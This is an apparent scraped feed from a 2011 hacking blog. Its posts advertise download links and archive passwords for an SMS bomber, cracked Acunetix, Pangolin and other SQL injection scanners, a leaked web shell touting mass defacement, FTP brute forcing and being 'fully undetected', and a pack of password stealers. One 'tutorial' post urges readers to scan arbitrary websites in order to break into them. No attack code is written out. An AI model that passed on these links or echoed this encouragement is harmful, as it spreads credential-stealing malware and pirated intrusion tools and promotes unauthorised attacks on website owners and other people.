FRM: Senders Email&lt;br /&gt;
SUBJ: Subject&lt;br /&gt;
MSG: Message&lt;br /&gt;
&lt;br /&gt;
What Is New In The Pro Version:&lt;br /&gt;
New GUI&lt;br /&gt;
Error Handling, For Example If There Was An Error Sending The Message It  Will Ask You If You Want To Change The E-mail/Password You Are Using.  This Is Just One Of The Many Error Handling I Have Added.&lt;br /&gt;
&lt;img alt="[Image: 1XB4F.png]" border="0" src="http://imgur.com/1XB4F.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
DOWNLOAD :&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;http://rapidshare.com/#!download|536tl2|335533492|Beaver_s_SMS_Bomber_Pro.exe|1089&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
LINK to External Forums :&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;http://hotfile.com/links/98601927/b9d67df/Beaver_s_SMS_Bomber_Pro.rar&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
PASSWORD For external Forums :&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;smsbomberpro&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-1878145738751088741?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PiTPH4frRa1tnqJ59RFMwpVWh5Y/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PiTPH4frRa1tnqJ59RFMwpVWh5Y/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PiTPH4frRa1tnqJ59RFMwpVWh5Y/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PiTPH4frRa1tnqJ59RFMwpVWh5Y/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/KWYBlzut8vc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/1878145738751088741/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/beavers-sms-bomber-pro.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1878145738751088741?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1878145738751088741?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/KWYBlzut8vc/beavers-sms-bomber-pro.html" title="Beaver's SMS Bomber Pro" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/beavers-sms-bomber-pro.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQCSH05eyp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-9086882814153871838</id><published>2011-03-23T22:59:00.003-07:00</published><updated>2011-03-23T22:59:29.323-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T22:59:29.323-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tools" /><title>ACUNETIX VER 7.0 cracked Working and UPDATEABLE!!</title><content type="html">&lt;span class="smalltext"&gt;&lt;strong&gt;ACUNETIX VER 7.0  cracked  Working and UPDATEABLE!! &lt;/strong&gt;&lt;/span&gt;      &lt;br /&gt;
&lt;div class="post_body" id="pid_12240"&gt;      &lt;span style="font-weight: bold;"&gt;I have checked in : Windows xp desktop Pc  and windows 7 Ultimate Laptop and is working and also is UPDATEABLE!! .. &lt;br /&gt;
&lt;br /&gt;
But please only use in Vmware because i am not 100 % if is clean ... &lt;br /&gt;
&lt;br /&gt;
Thanks...&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orangered;"&gt;&lt;span style="font-weight: bold;"&gt;Download Info &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;http://www.multiupload.com/EECTPQMDUH&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-9086882814153871838?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/VcDjOYzhlehrzBvJlJvMyPI7Z00/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VcDjOYzhlehrzBvJlJvMyPI7Z00/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/VcDjOYzhlehrzBvJlJvMyPI7Z00/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VcDjOYzhlehrzBvJlJvMyPI7Z00/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/IN2KsxplWBM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/9086882814153871838/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/acunetix-ver-70-cracked-working-and.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/9086882814153871838?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/9086882814153871838?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/IN2KsxplWBM/acunetix-ver-70-cracked-working-and.html" title="ACUNETIX VER 7.0 cracked Working and UPDATEABLE!!" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/acunetix-ver-70-cracked-working-and.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQHSH4ycCp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-8156179154589672877</id><published>2011-03-23T22:58:00.001-07:00</published><updated>2011-03-23T22:58:59.098-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T22:58:59.098-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tools" /><title>Pangolin Professional working TestEd</title><content type="html">am ussing about 1-2 weeks and is working .. is allot better then Havij  because cane work with https and also you cane upload files with load  file function .. if the magic quetes are right /// &lt;br /&gt;
&lt;br /&gt;
also please use only in vmware because i am not sure if is 100 % clean ..  i have used in Vmware under windows xp .. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;span style="color: orangered;"&gt;&lt;span style="font-weight: bold;"&gt; Download Info&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;http://www.multiupload.com/H5NWYJSASK&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-8156179154589672877?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/93qK2jM7CX6n680DTjXj3dveE7M/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/93qK2jM7CX6n680DTjXj3dveE7M/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/93qK2jM7CX6n680DTjXj3dveE7M/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/93qK2jM7CX6n680DTjXj3dveE7M/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/mifz_m587AE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/8156179154589672877/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/pangolin-professional-working-tested.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/8156179154589672877?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/8156179154589672877?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/mifz_m587AE/pangolin-professional-working-tested.html" title="Pangolin Professional working TestEd" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/pangolin-professional-working-tested.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D04MRnw4eSp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-6770177127346447774</id><published>2011-03-23T22:53:00.001-07:00</published><updated>2011-03-23T22:53:07.231-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T22:53:07.231-07:00</app:edited><title>TEAM p0ison shell private leaked!!contains great features of bypassing safe</title><content type="html">[ Features ]&lt;br /&gt;
- Mass Defacement Tool&lt;br /&gt;
- Safe Mode Bypass&lt;br /&gt;
- Open_Basedir Bypass&lt;br /&gt;
- Fixed SQL managed&lt;br /&gt;
- FTP Brute Force Tool&lt;br /&gt;
- Fully Undetected&lt;br /&gt;
And more...&lt;br /&gt;
i can't attach ! :-??&lt;br /&gt;
&lt;br /&gt;
Direct Link:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.up.iranblog.com/images/zx2p8rliegrjvdodzi.rar" target="_blank"&gt;http://www.up.iranblog.com/images/zx2p8r...vdodzi.rar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-6770177127346447774?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/m8BrIIEh5zcbU8Eb5y9zhFiotco/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/m8BrIIEh5zcbU8Eb5y9zhFiotco/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/m8BrIIEh5zcbU8Eb5y9zhFiotco/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/m8BrIIEh5zcbU8Eb5y9zhFiotco/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/rD5rudv5qKY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/6770177127346447774/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/team-p0ison-shell-private.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/6770177127346447774?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/6770177127346447774?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/rD5rudv5qKY/team-p0ison-shell-private.html" title="TEAM p0ison shell private leaked!!contains great features of bypassing safe" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>3</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/team-p0ison-shell-private.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0QER30-fSp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-4523997818798625425</id><published>2011-03-23T22:41:00.001-07:00</published><updated>2011-03-23T22:41:46.355-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T22:41:46.355-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="SQL INJECTION" /><title>[TUT] Hack about 80% of every website out there</title><content type="html">&lt;span style="color: dodgerblue;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-weight: bold;"&gt;All right,&lt;br /&gt;
&lt;br /&gt;
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.&lt;br /&gt;
&lt;br /&gt;
You want to learn to hack, stop asking stupid questions.&lt;br /&gt;
&lt;br /&gt;
There is ONE tool, that was created originally to protect from hackers.  Unfortunately, it's one of the best friends a hacker will ever have :&lt;br /&gt;
&lt;br /&gt;
It's called Acunetix.&lt;br /&gt;
&lt;br /&gt;
Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;sql&lt;/span&gt;,  xss, html injections, all java injections, all passwords and database  weaknesses, all ftp weaknesses, etc. All form submissions exploits that  the website can be targeted with. Remote upload and download  vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It will work in 80% of the cases, its database is updated regularly, but  websites with latest updates and a good admin might not be targetable.&lt;br /&gt;
&lt;br /&gt;
So here's the thing. Before you post anymore questions such as : "Can  this website be hacked ?" or "How do I hack this forum ?", download  Acunetix in the link below (I couldn't be bothered uploading a new one).&lt;br /&gt;
&lt;br /&gt;
DOWNLOAD :&lt;br /&gt;
&lt;a href="http://adf.ly/95012/www.megaupload.com/?d=JS47TMYS" target="_blank"&gt;HERE&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
PASSWORD : hf.net&lt;br /&gt;
(Uploaded by me, 100% clean)&lt;br /&gt;
&lt;br /&gt;
Simply install it and copy the crack folder content into your Acunetix  folder (replace files), and when you start the program, click on New  Scan, follow the steps (my 10 year old brother could do this).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It will answer most of your questions. Take any known website, scan them  and you'll find lots of little "medium risk" security problems etc. The  program will explain what the potential harms are, not how to do them.  The rest is up to you, do a bit of research, learn by yourself.&lt;br /&gt;
&lt;br /&gt;
So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.&lt;br /&gt;
&lt;br /&gt;
Oh, and last tip : &lt;a href="http://adf.ly/95012/www.google.com" target="_blank"&gt;http://www.google.com&lt;/a&gt; is your friend. Don't forget it before you ask anything else.&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-4523997818798625425?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/sUKJcUWpTmxd8u9MElQUBme0ty0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sUKJcUWpTmxd8u9MElQUBme0ty0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/sUKJcUWpTmxd8u9MElQUBme0ty0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/sUKJcUWpTmxd8u9MElQUBme0ty0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/sOyHkK07sT4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/4523997818798625425/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/tut-hack-about-80-of-every-website-out.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4523997818798625425?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4523997818798625425?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/sOyHkK07sT4/tut-hack-about-80-of-every-website-out.html" title="[TUT] Hack about 80% of every website out there" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/tut-hack-about-80-of-every-website-out.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0YASHY6fip7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-506826817540022250</id><published>2011-03-23T22:39:00.001-07:00</published><updated>2011-03-23T22:39:09.816-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T22:39:09.816-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tools" /><title>Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner</title><content type="html">&lt;span class="smalltext"&gt;&lt;strong&gt;Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner &lt;/strong&gt;&lt;/span&gt;      &lt;br /&gt;
&lt;div class="post_body" id="pid_7225"&gt;      Darkjumper is a free tool what will try to find every website that  hosts at the same server as your target. Then check for every  vulnerability of each website that host at the same server.&lt;br /&gt;
&lt;br /&gt;
Here are some key features of "Darkjumper":&lt;br /&gt;
&lt;br /&gt;
· scan sql injection, rfi, lfi, blind sql injection&lt;br /&gt;
· autosql injector&lt;br /&gt;
· proxy support&lt;br /&gt;
· verbocity&lt;br /&gt;
· autoftp bruteforcer&lt;br /&gt;
· IP or Proxy checker and GeoIP&lt;br /&gt;
&lt;br /&gt;
Requirements:&lt;br /&gt;
&lt;br /&gt;
· Python&lt;br /&gt;
&lt;br /&gt;
Screenshot: &lt;a href="http://gunslingerc0de.files.wordpress.com/2010/06/darkjumper.png" target="_blank"&gt;http://gunslingerc0de.files.wordpress.co...jumper.png&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Download link: &lt;a href="http://mac.softpedia.com/get/Security/Darkjumper.shtml" target="_blank"&gt;http://mac.softpedia.com/get/Security/Darkjumper.shtml&lt;/a&gt;     &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-506826817540022250?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-uOz1l9ha5EnXtK1olR24XDGOK8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-uOz1l9ha5EnXtK1olR24XDGOK8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-uOz1l9ha5EnXtK1olR24XDGOK8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-uOz1l9ha5EnXtK1olR24XDGOK8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/CjjdnRpHrqY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/506826817540022250/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/darkjumper-v58-sqlilfirfirce-scanner.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/506826817540022250?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/506826817540022250?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/CjjdnRpHrqY/darkjumper-v58-sqlilfirfirce-scanner.html" title="Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/darkjumper-v58-sqlilfirfirce-scanner.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0cARH8_fyp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-3859791833138866899</id><published>2011-03-23T22:37:00.000-07:00</published><updated>2011-03-23T22:37:25.147-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T22:37:25.147-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tools" /><title>Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool</title><content type="html">&lt;span class="smalltext"&gt;&lt;strong&gt;&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;l&lt;/span&gt; Poizon v1.1 - &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Sql&lt;/span&gt;i Exploit Scanner, Search Hunter, Injection Builder Tool &lt;/strong&gt;&lt;/span&gt;      &lt;br /&gt;
&lt;div class="post_body" id="pid_750"&gt;      Greetings All,&lt;br /&gt;
&lt;br /&gt;
After a very successfull release of &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Sql&lt;/span&gt;  Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with  the new release which is more handy. It has new features as well as bug  fixes from the older release. Please take a look for it below:&lt;br /&gt;
&lt;br /&gt;
New Features:&lt;br /&gt;
"Look n Feel" is more attractive now.&lt;br /&gt;
Rich "Context Menu" items.&lt;br /&gt;
"Results" contain checkboxes to enable selection.&lt;br /&gt;
"Selected Dork" box is editable now for user convenience.&lt;br /&gt;
Built-in Browser for "Injection Builder" to check the impact of injection.&lt;br /&gt;
"Text Bucket" available for "Injection Builder" to save extra data.&lt;br /&gt;
"Insert Order By" button is added to "Injection Builder".&lt;br /&gt;
"Internet Browser" with Snapshot and HTML DOM Tree.&lt;br /&gt;
&lt;br /&gt;
Bug Fixes:&lt;br /&gt;
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.&lt;br /&gt;
Progress bar for "Crawler" has been fixed. It will show correct progress now.&lt;br /&gt;
Error on importing file is fixed now. You can import files from other directories as well.&lt;br /&gt;
"Searchqu" shows invalid results. It is fixed now.&lt;/div&gt;&lt;div class="post_body" id="pid_750"&gt;Download:&lt;br /&gt;
&lt;a href="http://adf.ly/95012/rapidshare.com/#%21download%7C27l35%7C440158132%7CSql_Poizon_v1.1_-_Sqli_Exploit_Scanner_Tool.rar%7C374" target="_blank"&gt;http://rapidshare.com/#!download|27l35|4...ol.rar|374&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
LINK TO External Forums :&lt;br /&gt;
&lt;a href="http://adf.ly/95012/hotfile.com/dl/97694563/d3f96e3/Sql_Poizon_v1.1_-_Sqli_Exploit_Scanner_Tool.rar.html" target="_blank"&gt;http://hotfile.com/dl/97694563/d3f96e3/S...l.rar.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
PASSWORD For External Forums :&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;sqlinjection200&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-3859791833138866899?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/gAWK8LynSl7jlkYkvXEqsRzma1g/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gAWK8LynSl7jlkYkvXEqsRzma1g/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/gAWK8LynSl7jlkYkvXEqsRzma1g/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gAWK8LynSl7jlkYkvXEqsRzma1g/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/mktz7Hq82U4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/3859791833138866899/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/sql-poizon-v11-sqli-exploit-scanner.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/3859791833138866899?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/3859791833138866899?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/mktz7Hq82U4/sql-poizon-v11-sqli-exploit-scanner.html" title="Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/sql-poizon-v11-sqli-exploit-scanner.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A04ER3o9fip7ImA9Wx9aGEo.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-1966325692664903283</id><published>2011-03-11T13:45:00.000-08:00</published><updated>2011-03-11T13:45:06.466-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-11T13:45:06.466-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Password Stealers" /><title>ALL IN ONE</title><content type="html">multiple stealers AIO .rar thanks to sedurnas from hackforums.net&lt;br /&gt;
&lt;img alt="" src="http://img11.imageshack.us/img11/4117/72788408.png" /&gt;&lt;br /&gt;
DOWNLOADS:&lt;br /&gt;
&lt;a href="http://www.2shared.com/file/5201353/6a9ccd48/SedurnasS_StealerS_Pack.html" target="_blank"&gt;http://www.2shared.com/file/5201353/6a9ccd48/SedurnasS_StealerS_Pack.html&lt;/a&gt;&lt;br /&gt;
MIRROR: &lt;a href="http://www.file-upload.net/download-1555872/Sedurnas--S-Stealer--S-Pack.rar.html" target="_self"&gt;http://www.file-upload.net/download-1555872/Sedurnas--S-Stealer--S-Pack.rar.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-1966325692664903283?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
